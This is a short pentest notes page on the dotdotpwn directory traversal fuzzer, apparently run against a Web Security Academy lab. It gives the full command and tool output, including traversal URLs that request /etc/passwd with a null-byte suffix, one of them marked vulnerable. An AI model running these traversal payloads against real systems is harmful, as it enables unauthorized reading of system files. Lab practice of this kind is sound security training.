dotdotpwn

Reference

Code:

perl ./dotdotpwn.pl -m http-url -h https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/ -u https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=TRAVERSAL  -k "root" -e "%00.png"

Example:

โ”Œโ”€โ”€(eoใ‰ฟoffsec)-[~/Tools/dotdotpwn]
โ””โ”€$ perl ./dotdotpwn.pl -m http-url -h https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/ -u https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=TRAVERSAL  -k "root" -e "%00.png"
#################################################################################
#                                                                               #
#  CubilFelino                                                       Chatsubo   #
#  Security Research Lab              and            [(in)Security Dark] Labs   #
#  chr1x.sectester.net                             chatsubo-labs.blogspot.com   #
#                                                                               #
#                               pr0udly present:                                #
#                                                                               #
#  ________            __  ________            __  __________                   #
#  \______ \    ____ _/  |_\______ \    ____ _/  |_\______   \__  _  __ ____    #
#   |    |  \  /  _ \\   __\|    |  \  /  _ \\   __\|     ___/\ \/ \/ //    \   #
#   |    `   \(  <_> )|  |  |    `   \(  <_> )|  |  |    |     \     /|   |  \  #
#  /_______  / \____/ |__| /_______  / \____/ |__|  |____|      \/\_/ |___|  /  #
#          \/                      \/                                      \/   #
#                              - DotDotPwn v3.0.2 -                             #
#                         The Directory Traversal Fuzzer                        #
#                         http://dotdotpwn.sectester.net                        #
#                            dotdotpwn@sectester.net                            #
#                                                                               #
#                               by chr1x & nitr0us                              #
#################################################################################

[+] Report name: Reports/0ab800e204755c80c049142e009d00d3.web-security-academy.net_11-21-2022_23-19.txt

[========== TARGET INFORMATION ==========]
[+] Hostname: 0ab800e204755c80c049142e009d00d3.web-security-academy.net
[+] Protocol: https
[+] Port: 443

[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (unix)
[+] Including Special sufixes
[+] Appending the file extension %00.png to each fuzz string
[+] Traversal Engine DONE ! - Total traversal tests created: 11052

[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)

[+] Replacing "TRAVERSAL" with the traversals created and sending
[*] Testing URL: https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=../etc/passwd%00.png
[*] Testing URL: https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=../etc/issue%00.png
[*] Testing URL: https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=../../etc/passwd%00.png
[*] Testing URL: https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=../../etc/issue%00.png

[*] Testing URL: https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=../../../etc/passwd%00.png <- VULNERABLE

  • [*] Testing URL: https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=../../../etc/passwd%00.png <- VULNERABLE

PreviousLog PoisoningNextWFUZZ

Last updated